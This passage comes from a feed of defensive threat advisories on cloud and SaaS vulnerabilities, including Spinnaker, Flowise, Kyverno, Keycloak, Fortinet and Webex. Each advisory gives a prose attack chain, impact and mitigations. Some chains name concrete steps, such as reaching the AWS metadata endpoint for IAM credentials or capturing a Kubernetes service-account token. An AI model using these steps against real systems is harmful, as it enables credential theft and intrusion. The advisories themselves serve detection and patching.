<li><strong>Data Exfiltration/Manipulation:</strong> Once established within the environment, the attacker exfiltrates sensitive data or manipulates data for malicious purposes.</li>
<li><strong>Spoofing Attacks:</strong> The attacker leverages the compromised environment to launch spoofing attacks, potentially targeting other users or systems with phishing emails or other deceptive tactics.</li>
<li><strong>Persistence:</strong> The attacker establishes persistence within the cloud environment to maintain access even after the initial vulnerability is patched.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities could have significant consequences, including unauthorized access to sensitive data, disruption of critical business processes, and financial losses. The number of potential victims is substantial, given the widespread use of Microsoft cloud services across various sectors. A successful attack could result in data breaches, service outages, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor logs from Microsoft Azure, Microsoft 365 Copilot, Microsoft Dynamics 365, and Microsoft Power Apps for suspicious activity indicative of privilege escalation, code execution, and spoofing attacks.</li>
<li>Enable and review audit logs within the affected Microsoft cloud services to identify anomalous user behavior and potential security breaches.</li>
<li>Deploy the Sigma rules provided in this brief to your SIEM and tune them for your specific environment to detect potential exploitation attempts.</li>
<li>Follow Microsoft&rsquo;s official security advisories and apply any available patches or mitigations as soon as they are released.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>privilege-escalation</category><category>code-execution</category><category>spoofing</category></item><item><title>AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/</link><pubDate>Wed, 22 Apr 2026 17:45:55 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/</guid><description>Attackers are stealing AWS credentials configured as GitHub Actions secrets and using them from non-CI/CD infrastructure, indicating potential credential theft and unauthorized access to AWS resources.</description><content:encoded><![CDATA[<p>This threat involves the unauthorized use of AWS credentials stolen from GitHub Actions secrets. Attackers exfiltrate these credentials and use them from their own infrastructure, bypassing the intended CI/CD environment. The activity is detected by observing AWS access keys appearing in CloudTrail logs originating from both legitimate GitHub Actions runners (identified by Microsoft ASN or the <code>github-actions</code> user agent string) and suspicious infrastructure outside the expected CI/CD provider ASNs (Amazon, Google, Microsoft). This indicates a breach of GitHub repository or organization secrets, leading to potential unauthorized access and control over AWS resources. This activity can begin with compromised Github accounts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to a GitHub repository or organization with AWS credentials stored as secrets.</li>
<li>The attacker exfiltrates the AWS access key ID and secret access key, either manually or through automated means, such as modifying a GitHub Action workflow to expose the secrets.</li>
<li>The attacker configures the stolen AWS credentials on their own infrastructure, using tools like the AWS CLI or boto3.</li>
<li>The attacker attempts to authenticate to AWS using the stolen credentials. This generates CloudTrail logs with the attacker&rsquo;s source IP address and ASN.</li>
<li>The attacker performs reconnaissance activities, such as calling <code>sts:GetCallerIdentity</code>, <code>ListBuckets</code>, <code>DescribeInstances</code>, or <code>ListUsers</code>, to understand the AWS environment and identify potential targets.</li>
<li>The attacker attempts to escalate privileges or move laterally within the AWS environment by exploiting the compromised credentials.</li>
<li>The attacker may create, modify, or delete AWS resources, such as EC2 instances, S3 buckets, or IAM roles, depending on the permissions associated with the stolen credentials.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation leads to unauthorized access to AWS resources, potentially resulting in data breaches, service disruptions, or financial losses. The impact depends on the permissions associated with the stolen AWS credentials. A single compromised credential could expose sensitive data, disrupt critical services, or allow attackers to deploy malicious infrastructure within the victim&rsquo;s AWS environment. Identifying and responding to this threat quickly is vital to minimize damages.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure&rdquo; to your SIEM and tune for your environment to detect suspicious usage patterns.</li>
<li>Rotate the compromised AWS access key in IAM immediately and update the corresponding GitHub repository/organization secret as described in the rule documentation.</li>
<li>Implement OIDC-based authentication (<code>aws-actions/configure-aws-credentials</code> with <code>role-to-assume</code>) instead of long-lived access keys as mentioned in the rule documentation.</li>
<li>If using OIDC, add IP condition policies to the IAM role trust policy to restrict <code>AssumeRoleWithWebIdentity</code> to known GitHub runner IP ranges, based on the information in the rule documentation.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>github</category><category>credential-theft</category><category>initial-access</category><category>lateral-movement</category></item><item><title>Spinnaker Echo Service Vulnerable to Spring Expression Language Injection</title><link>https://feed.craftedsignal.io/briefs/2026-04-spinnaker-spel/</link><pubDate>Mon, 20 Apr 2026 21:19:10 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-spinnaker-spel/</guid><description>Unrestricted access to the JVM via Spring Expression Language (SPeL) in Spinnaker's Echo service allows for arbitrary code execution, enabling attackers to invoke commands and access files.</description><content:encoded><![CDATA[<p>Spinnaker is an open-source, multi-cloud continuous delivery platform. The Echo service, like other services within Spinnaker, utilizes Spring Expression Language (SPeL) for processing information, specifically concerning expected artifacts. However, versions prior to 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2 did not restrict the context of SPeL to a set of trusted classes, granting full JVM access, unlike Orca. This unrestricted access enables a user to leverage arbitrary Java classes, facilitating deep system access. This vulnerability allows attackers to execute arbitrary commands, access sensitive files, and potentially compromise the entire Spinnaker environment. Defenders should upgrade to patched versions or disable the Echo service as a workaround to mitigate this critical risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious payload containing a SpEL expression.</li>
<li>This payload is submitted to the Echo service via a network request, likely through a specifically crafted API call involving expected artifacts.</li>
<li>The Echo service processes the request and evaluates the malicious SpEL expression without proper context restrictions.</li>
<li>The SpEL expression leverages Java classes to bypass security controls and gain access to underlying system resources.</li>
<li>The attacker uses the unrestricted JVM access to execute arbitrary commands on the server.</li>
<li>Successful command execution allows the attacker to read and write files on the system.</li>
<li>The attacker leverages file access to obtain sensitive information such as credentials or configuration files.</li>
<li>The attacker uses the compromised system to move laterally within the Spinnaker environment or target connected cloud resources. The final objective is likely complete control over the Spinnaker deployment and its connected infrastructure.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows for arbitrary code execution on the Spinnaker server. This can lead to complete system compromise, allowing attackers to steal sensitive data, disrupt continuous delivery pipelines, and potentially gain access to connected cloud environments. Due to the critical nature of Spinnaker in managing deployments, a successful attack could severely impact an organization&rsquo;s ability to deploy and maintain applications, potentially leading to significant financial and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Spinnaker instances to versions 2026.1.0, 2026.0.1, 2025.4.2, or 2025.3.2 to patch CVE-2026-32613.</li>
<li>As a temporary workaround, disable the Echo service entirely until the upgrade can be performed, referencing the vendor documentation for disabling specific Spinnaker services.</li>
<li>Monitor web server logs for unusual HTTP requests to the Echo service endpoints, specifically looking for suspicious patterns or attempts to inject SpEL expressions, using the Sigma rule provided below.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>spel</category><category>code-execution</category><category>cloud</category></item><item><title>Critical Certificate Validation Vulnerability in CISCO Webex Allows User Impersonation</title><link>https://feed.craftedsignal.io/briefs/2026-04-cisco-webex-cert-bypass/</link><pubDate>Fri, 17 Apr 2026 09:19:48 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-cisco-webex-cert-bypass/</guid><description>A critical improper certificate validation vulnerability in CISCO Webex versions 39.6 - 45.4 (CVE-2026-20184) allows a remote, unprivileged attacker to impersonate users, gain unauthorized access, and join meetings without authorization, potentially impacting confidentiality, integrity, and availability.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-20184, has been identified in the Single Sign-On (SSO) implementation with Control Hub in CISCO Webex versions 39.6 through 45.4. This improper certificate validation issue allows an unauthenticated, remote attacker to bypass security controls and impersonate legitimate users. CISCO Webex is a widely used cloud-based platform for video meetings and collaboration. Successful exploitation could lead to unauthorized access to sensitive information, disruption of services, and a complete compromise of the CIA triad. The vulnerability poses a significant risk to organizations relying on Webex for internal and external communications. Public proof-of-concept or proof-of-exploitation code is not yet available, but the severity and ease of exploitation warrant immediate attention and patching.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable CISCO Webex instance running a version between 39.6 and 45.4.</li>
<li>The attacker crafts a malicious token designed to exploit the improper certificate validation flaw in the SSO with Control Hub.</li>
<li>The attacker connects to a Webex service endpoint, presenting the crafted token.</li>
<li>The vulnerable Webex instance fails to properly validate the certificate associated with the token.</li>
<li>The attacker is authenticated as a targeted user without providing valid credentials.</li>
<li>The attacker gains unauthorized access to the targeted user&rsquo;s sensitive information, including meeting schedules, contact lists, and potentially recorded meetings.</li>
<li>The attacker joins Webex meetings without authorization, potentially eavesdropping on confidential conversations or disrupting the meeting.</li>
<li>The attacker escalates privileges within the Webex environment by leveraging the compromised user&rsquo;s access rights, potentially gaining administrative control.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-20184 can lead to severe consequences. Attackers can impersonate any user within the Webex service, gaining unauthorized access to confidential meetings, sensitive data, and internal communications. This can result in a breach of confidentiality, integrity, and availability, potentially leading to significant financial losses, reputational damage, and legal liabilities. The number of affected organizations could be substantial given Webex&rsquo;s widespread use across various sectors.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately patch all CISCO Webex installations to a version beyond 45.4 to remediate CVE-2026-20184 (Reference: CISCO Security Advisory).</li>
<li>Upscale monitoring and detection capabilities to identify any suspicious activity related to unauthorized access attempts within the CISCO Webex environment, as recommended by the CCB (Reference: CCB Advisory).</li>
<li>Implement the provided Sigma rule to detect suspicious authentication patterns indicative of exploitation attempts against Webex (Reference: Sigma rule - &ldquo;Webex Suspicious Authentication Pattern&rdquo;).</li>
<li>Enable and review Webex access logs for unusual login attempts or access patterns originating from unexpected locations (Reference: Webex access logs).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cisco</category><category>webex</category><category>sso</category><category>certificate-validation</category><category>user-impersonation</category><category>cve-2026-20184</category><category>cloud</category></item><item><title>Flowise SSRF Protection Bypass via Unprotected Built-in HTTP Modules</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-flowise-ssrf/</link><pubDate>Thu, 16 Apr 2026 21:50:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-flowise-ssrf/</guid><description>Flowise is vulnerable to SSRF protection bypass via unprotected built-in HTTP modules in the custom function sandbox, allowing authenticated users to access internal network resources by exploiting the lack of SSRF protection on Node.js `http`, `https`, and `net` modules.</description><content:encoded><![CDATA[<p>Flowise, a low-code platform for building custom automation workflows, is susceptible to a Server-Side Request Forgery (SSRF) protection bypass. This vulnerability stems from the application&rsquo;s incomplete implementation of SSRF defenses. While <code>axios</code> and <code>node-fetch</code> libraries are secured with an <code>HTTP_DENY_LIST</code>, the built-in Node.js modules <code>http</code>, <code>https</code>, and <code>net</code> are permitted within the NodeVM sandbox without any equivalent restrictions. An authenticated attacker can exploit this oversight in Flowise version 3.0.13 and earlier to make arbitrary HTTP requests to internal network resources. This issue allows bypassing intended security controls and potentially accessing sensitive information, such as cloud provider metadata services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker authenticates to a Flowise instance using a valid API key or session.</li>
<li>The attacker crafts a malicious JavaScript payload designed to exploit the custom function feature.</li>
<li>The malicious payload imports the built-in <code>http</code> module.</li>
<li>The payload constructs an HTTP request targeting an internal resource, such as the AWS metadata service at <code>169.254.169.254</code>.</li>
<li>The request includes a header to obtain an IAM token: <code>'X-aws-ec2-metadata-token-ttl-seconds': '21600'</code>.</li>
<li>The payload uses the obtained IAM token to request temporary AWS credentials from the metadata service.</li>
<li>The custom function executes the code within the NodeVM sandbox, bypassing the intended SSRF protection.</li>
<li>The attacker retrieves the temporary AWS credentials from the metadata service, potentially leading to unauthorized access to AWS resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can have significant consequences. Attackers can steal temporary IAM credentials from cloud provider metadata services, granting them unauthorized access to other cloud resources. Furthermore, they can scan internal networks to discover services and identify additional attack targets. The ability to reach databases, admin panels, and other internal APIs that should not be externally accessible poses a severe security risk, potentially leading to data breaches or system compromise. All Flowise deployments where <code>HTTP_DENY_LIST</code> is configured for SSRF protection are vulnerable, while deployments without it are already generally vulnerable to SSRF.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the necessary patches to Flowise to remediate the SSRF vulnerability as described in GHSA-xhmj-rg95-44hv.</li>
<li>Deploy the following Sigma rule to detect exploitation attempts involving the <code>http</code> module targeting common cloud metadata endpoints: <code>Flowise SSRF Using HTTP Module</code>.</li>
<li>Enable logging of HTTP requests originating from the Flowise server to aid in identifying and investigating potential SSRF attacks.</li>
<li>Review and harden network segmentation to limit the impact of potential SSRF vulnerabilities.</li>
<li>Consider disabling the custom function feature if it is not essential to the functionality of the Flowise deployment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>flowise</category><category>cloud</category></item><item><title>Pyroscope Secret Key Exposure via Tencent COS Configuration (CVE-2025-41118)</title><link>https://feed.craftedsignal.io/briefs/2026-04-pyroscope-secret-key-leak/</link><pubDate>Thu, 16 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-pyroscope-secret-key-leak/</guid><description>CVE-2025-41118 allows an attacker with direct access to the Pyroscope API, when configured with Tencent COS, to extract the secret_key configuration value, potentially leading to unauthorized access to the cloud storage backend.</description><content:encoded><![CDATA[<p>Pyroscope is an open-source continuous profiling database that supports various storage backends, including Tencent Cloud Object Storage (COS). A vulnerability, identified as CVE-2025-41118, exists where an attacker with direct access to the Pyroscope API can extract the <code>secret_key</code> configuration value when Tencent COS is used as the storage backend. This vulnerability poses a significant risk as the exposed secret key could allow unauthorized access to the Tencent COS storage, potentially leading to data breaches or other malicious activities. The vulnerability has been patched in versions 1.15.2 and above, 1.16.1 and above, and all versions of 1.17.x. It is strongly recommended to limit public internet exposure of Pyroscope API instances.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains network access to the Pyroscope API endpoint, either through public exposure or internal network penetration.</li>
<li>Attacker sends a crafted HTTP request to the Pyroscope API endpoint designed to expose configuration details. The specific API endpoint and parameters are not detailed in the source but are assumed to exist for configuration management.</li>
<li>The vulnerable Pyroscope API processes the request without proper authorization or input validation.</li>
<li>The API retrieves the Tencent COS storage configuration, including the <code>secret_key</code>.</li>
<li>The <code>secret_key</code> is inadvertently included in the API response to the attacker.</li>
<li>Attacker extracts the <code>secret_key</code> from the API response.</li>
<li>Attacker uses the compromised <code>secret_key</code> to authenticate to Tencent COS.</li>
<li>Attacker gains unauthorized access to data stored in the Tencent COS bucket associated with the compromised <code>secret_key</code>, potentially leading to data exfiltration, modification, or deletion.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2025-41118 grants an attacker unauthorized access to the Tencent COS storage backend used by Pyroscope. This access allows the attacker to read, modify, or delete data stored in the cloud storage. The impact depends on the sensitivity of the data stored in Tencent COS. In a worst-case scenario, a complete data breach and service disruption are possible. The number of affected Pyroscope installations is currently unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Pyroscope instances to the patched versions: 1.15.2+, 1.16.1+, or any 1.17.x version to remediate CVE-2025-41118.</li>
<li>Implement network access controls to restrict access to the Pyroscope API to trusted users or internal systems, mitigating initial access, as suggested in the overview.</li>
<li>Deploy the Sigma rule <code>Detect Pyroscope Configuration Request</code> to identify potential attempts to access sensitive configuration data via the API.</li>
<li>Regularly review and audit the configuration of Pyroscope and its storage backends (Tencent COS) to ensure proper security measures are in place.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>pyroscope</category><category>tencent-cos</category><category>secret-key-exposure</category><category>cve-2025-41118</category><category>cloud</category></item><item><title>Keycloak Cross-Site Scripting Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/</link><pubDate>Wed, 15 Apr 2026 07:33:56 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/</guid><description>An authenticated remote attacker can exploit a vulnerability in Keycloak to perform a Cross-Site Scripting attack, potentially leading to unauthorized access and data compromise.</description><content:encoded><![CDATA[<p>A Cross-Site Scripting (XSS) vulnerability exists within Keycloak, a widely-used open-source identity and access management solution. This vulnerability allows a remote, authenticated attacker to inject malicious scripts into web pages viewed by other users. The attacker must possess valid credentials to initially access the vulnerable Keycloak instance. While the specific version affected is not provided in this advisory, it&rsquo;s crucial for organizations using Keycloak to investigate and apply necessary patches or mitigations. The impact of successful exploitation ranges from defacement to sensitive data theft and account compromise. Defenders should prioritize patching Keycloak installations and implementing input validation to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the Keycloak instance with valid credentials.</li>
<li>Attacker identifies a vulnerable input field or parameter within the Keycloak application (e.g., user profile, group name, etc.).</li>
<li>Attacker crafts a malicious payload containing JavaScript code.</li>
<li>Attacker injects the malicious payload into the vulnerable input field.</li>
<li>The Keycloak application stores the malicious payload without proper sanitization.</li>
<li>A victim user (e.g., another authenticated user or an administrator) accesses the page containing the injected payload.</li>
<li>The victim&rsquo;s browser executes the malicious JavaScript code.</li>
<li>The attacker can then steal cookies, redirect the user to a malicious site, or perform other actions on behalf of the victim.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this XSS vulnerability can lead to several negative consequences. An attacker could potentially steal session cookies, allowing them to impersonate other users, including administrators. This could grant them unauthorized access to sensitive data, configuration settings, and management functions. Furthermore, the attacker could deface the Keycloak interface, inject phishing scams, or redirect users to malicious websites. The number of victims depends on the number of users accessing the page with the injected XSS payload.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement input validation and output encoding to prevent XSS attacks within Keycloak.</li>
<li>Review Keycloak access logs for suspicious activity related to user profiles and injected scripts.</li>
<li>Deploy the Sigma rule to detect possible XSS attempts in Keycloak logs.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>keycloak</category><category>xss</category><category>cross-site scripting</category><category>cloud</category></item><item><title>Kyverno Service Account Token Leak via API Call</title><link>https://feed.craftedsignal.io/briefs/2026-04-kyverno-token-leak/</link><pubDate>Tue, 14 Apr 2026 20:09:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-kyverno-token-leak/</guid><description>Kyverno's apiCall serviceCall helper implicitly injects the Kyverno controller service account token into requests when policies lack an explicit Authorization header, allowing exfiltration to attacker-controlled endpoints and unauthorized actions.</description><content:encoded><![CDATA[<p>A vulnerability exists in Kyverno versions prior to 1.17.0 where the <code>apiCall</code> and <code>serviceCall</code> helpers automatically inject the Kyverno controller&rsquo;s service account token into outgoing requests. This occurs when a Kyverno policy does not explicitly define an <code>Authorization</code> header for the request. Because the destination URL for these API calls is policy-controlled via <code>context.apiCall.service.url</code>, a malicious actor could create or modify a <code>ClusterPolicy</code> or <code>GlobalContextEntry</code> to direct these requests—and thus the service account token—to an attacker-controlled endpoint. This vulnerability allows for token exfiltration and subsequent unauthorized actions, depending on the RBAC permissions granted to the Kyverno service account. This issue is limited to <code>ClusterPolicy</code> and global context usage, as namespaced policies are blocked from <code>servicecall</code> usage.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains the ability to create or modify <code>ClusterPolicy</code> objects, potentially by compromising a GitOps repository or controller managing Kyverno policies.</li>
<li>Attacker crafts a malicious <code>ClusterPolicy</code> that uses the <code>apiCall</code> or <code>serviceCall</code> feature.</li>
<li>The policy specifies a URL for the <code>context.apiCall.service.url</code> that points to an attacker-controlled endpoint designed to capture the incoming request.</li>
<li>The crafted policy does not define an explicit <code>Authorization</code> header for the <code>apiCall</code> or <code>serviceCall</code>.</li>
<li>When the policy is triggered, Kyverno&rsquo;s <code>executor.addHTTPHeaders</code> function detects the missing <code>Authorization</code> header.</li>
<li>Kyverno reads the service account token from <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>.</li>
<li>Kyverno injects the service account token into the request header as <code>Authorization: Bearer &lt;token&gt;</code>.</li>
<li>The request, including the Kyverno service account token, is sent to the attacker-controlled endpoint, allowing the attacker to exfiltrate the token.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability results in the exfiltration of the Kyverno controller service account token. The severity of the impact depends on the RBAC roles and permissions assigned to the Kyverno service account within the Kubernetes cluster. With the stolen token, an attacker can perform any action that the Kyverno service account is authorized to perform, potentially leading to cluster-wide compromise, data breaches, or denial-of-service conditions. The number of affected clusters would depend on the number of Kyverno deployments using vulnerable versions.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Kyverno to version 1.17.0 or later to patch the vulnerability (go/github.com/kyverno/kyverno).</li>
<li>Implement monitoring to detect modifications to <code>ClusterPolicy</code> resources, especially those utilizing <code>apiCall</code> or <code>serviceCall</code> to arbitrary URLs, to quickly identify potentially malicious policy changes.</li>
<li>Deploy the provided Sigma rule to detect unexpected outbound network connections from the Kyverno pod that may indicate token exfiltration.</li>
<li>As a workaround, set explicit <code>Authorization</code> headers in all <code>apiCall</code> and <code>serviceCall</code> policies to prevent the implicit token injection (see workarounds).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kyverno</category><category>token-leak</category><category>cloud</category></item><item><title>Fortinet FortiAnalyzer and FortiManager Cloud Heap-Based Buffer Overflow Vulnerability (CVE-2026-22828)</title><link>https://feed.craftedsignal.io/briefs/2026-04-fortinet-heap-overflow/</link><pubDate>Tue, 14 Apr 2026 16:16:37 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-fortinet-heap-overflow/</guid><description>CVE-2026-22828 is a heap-based buffer overflow in Fortinet FortiAnalyzer and FortiManager Cloud versions 7.6.2 through 7.6.4, potentially allowing a remote unauthenticated attacker to execute arbitrary code with a significant preparation effort due to ASLR and network segmentation.</description><content:encoded><![CDATA[<p>A heap-based buffer overflow vulnerability, identified as CVE-2026-22828, affects Fortinet FortiAnalyzer Cloud and FortiManager Cloud versions 7.6.2 through 7.6.4. The vulnerability allows a remote, unauthenticated attacker to potentially execute arbitrary code or commands. Exploitation necessitates sending specifically crafted requests to the affected systems. The complexity of a successful exploit is amplified by the presence of Address Space Layout Randomization (ASLR) and network segmentation, which impose significant hurdles for attackers in preparing the environment for code execution. This vulnerability poses a risk to organizations utilizing these Fortinet cloud services, potentially allowing for unauthorized access and control.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable FortiAnalyzer or FortiManager Cloud instance running versions 7.6.2-7.6.4.</li>
<li>The attacker crafts a malicious HTTP request designed to trigger the heap-based buffer overflow. This involves analyzing the vulnerable application to identify the specific request parameters and data structures that can be manipulated.</li>
<li>The attacker sends the crafted request to the targeted Fortinet Cloud instance.</li>
<li>Due to the buffer overflow, the crafted request overwrites adjacent memory on the heap, potentially corrupting data structures used by the application.</li>
<li>The attacker attempts to leverage the memory corruption to gain control of program execution. Because of ASLR, this step requires careful planning and potentially multiple attempts to bypass address randomization.</li>
<li>Upon successful bypass of ASLR, the attacker overwrites a function pointer or other critical data in memory to redirect program control to attacker-controlled code.</li>
<li>The attacker executes arbitrary code within the context of the FortiAnalyzer or FortiManager Cloud process.</li>
<li>The attacker can now execute commands, potentially gaining unauthorized access to sensitive data, modifying system configurations, or deploying further malicious payloads within the cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-22828 can allow a remote, unauthenticated attacker to execute arbitrary code on vulnerable Fortinet FortiAnalyzer Cloud and FortiManager Cloud instances (versions 7.6.2 through 7.6.4). While the effort required is considerable, a successful attack can lead to a complete compromise of the affected system, potentially resulting in data breaches, service disruption, or the deployment of malicious software. The absence of specific victim counts or sector targeting details in the original advisory emphasizes the importance of proactive mitigation.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches or upgrade to a fixed version of Fortinet FortiAnalyzer Cloud and FortiManager Cloud to address CVE-2026-22828 (<a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-121)">https://fortiguard.fortinet.com/psirt/FG-IR-26-121)</a>.</li>
<li>Implement network segmentation to limit the potential impact of a successful exploit, as mentioned in the vulnerability description.</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious HTTP Requests to Fortinet Cloud Services&rdquo; to identify potential exploitation attempts (see rule below).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-22828</category><category>fortinet</category><category>heap-overflow</category><category>cloud</category></item><item><title>ZTE ZXEDM iEMS Password Reset Vulnerability (CVE-2026-40436)</title><link>https://feed.craftedsignal.io/briefs/2026-04-zte-zxedm-password-reset/</link><pubDate>Mon, 13 Apr 2026 07:16:50 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-zte-zxedm-password-reset/</guid><description>CVE-2026-40436 is a vulnerability in the ZTE ZXEDM iEMS product that allows attackers to reset user passwords due to improper access control on the user list acquisition function within the cloud EMS portal, potentially leading to unauthorized operations and system compromise.</description><content:encoded><![CDATA[<p>CVE-2026-40436 is a critical vulnerability affecting ZTE ZXEDM iEMS, a cloud EMS portal, disclosed in April 2026. The vulnerability arises from inadequate access control within the user list acquisition function. An attacker, with low-level privileges (i.e., access to the cloud EMS portal), can exploit this flaw to retrieve a comprehensive list of all users managed by the system. Subsequently, leveraging the obtained user information, the attacker can reset passwords for targeted accounts, gaining unauthorized access and potentially compromising the entire system. The absence of proper authorization checks on the user list interface is the root cause. This allows an attacker to perform illegitimate password resets, leading to data breaches, service disruption, or further malicious activities within the iEMS environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains low-privileged access to the ZTE ZXEDM iEMS cloud EMS portal.</li>
<li>Attacker accesses the user list interface without proper authorization checks.</li>
<li>The system improperly grants access to the full user list information.</li>
<li>Attacker extracts usernames and associated account details from the user list.</li>
<li>Attacker initiates a password reset request for a targeted user account.</li>
<li>The system, lacking proper validation, allows the attacker to reset the password.</li>
<li>Attacker uses the newly reset password to log in to the targeted user account.</li>
<li>Attacker performs unauthorized operations, potentially exfiltrating sensitive data or disrupting services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-40436 could lead to a complete compromise of the ZTE ZXEDM iEMS system. The ability to reset passwords for any user grants the attacker full control over affected accounts. Depending on the privileges associated with compromised accounts, an attacker could gain access to sensitive configuration data, customer information, or critical infrastructure controls. The lack of specific victim numbers or sectors targeted in the initial report suggests the scope is variable based on deployment. The CVSS score of 7.1 indicates a high potential for confidentiality, integrity, and availability impact.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to the latest version of ZTE ZXEDM iEMS as provided by ZTE to address CVE-2026-40436.</li>
<li>Implement stricter access control policies on the cloud EMS portal, specifically for the user list acquisition function, and test the effectiveness of the changes.</li>
<li>Deploy the Sigma rule &ldquo;Detect Account Password Reset Activity&rdquo; to identify suspicious password reset activity in the iEMS environment.</li>
<li>Enable and monitor authentication logs for unauthorized access attempts following password resets to detect potential exploitation.</li>
<li>Review user account privileges and enforce the principle of least privilege to minimize the impact of potential account compromise.</li>
<li>Investigate any successful exploitation attempts using the system logs and network traffic to identify the scope of the breach and compromised data.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve</category><category>password-reset</category><category>zte</category><category>zxedm</category><category>cloud</category></item><item><title>AWS S3 Rapid Bucket Posture API Calls Indicate Reconnaissance</title><link>https://feed.craftedsignal.io/briefs/2026-04-aws-s3-reconnaissance/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-aws-s3-reconnaissance/</guid><description>An AWS principal rapidly enumerates S3 bucket configurations using read-only APIs, potentially indicating reconnaissance activity by security scanners, CSPM tools, or malicious actors performing post-compromise enumeration.</description><content:encoded><![CDATA[<p>This threat brief details detection of rapid enumeration of AWS S3 bucket configurations. The activity is characterized by an AWS principal invoking read-only S3 control-plane APIs across numerous buckets within a short timeframe. This pattern is consistent with automated reconnaissance, security scanning, or post-compromise enumeration. The activity is detected by monitoring AWS CloudTrail logs for specific API calls such as <code>GetBucketAcl</code>, <code>GetBucketPublicAccessBlock</code>, <code>GetBucketPolicy</code>, <code>GetBucketPolicyStatus</code>, and <code>GetBucketVersioning</code>. The detection logic excludes AWS service principals and sessions using Management Console credentials to reduce false positives. This activity is relevant for defenders as it can signal early-stage reconnaissance by threat actors like Team PCP, or unauthorized data discovery within the AWS environment. The rule uses a threshold of 15 distinct buckets accessed within 10 seconds to identify suspicious behavior.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to AWS credentials, possibly through compromised credentials or misconfigured IAM roles.</li>
<li>The attacker uses the acquired credentials to authenticate to the AWS environment.</li>
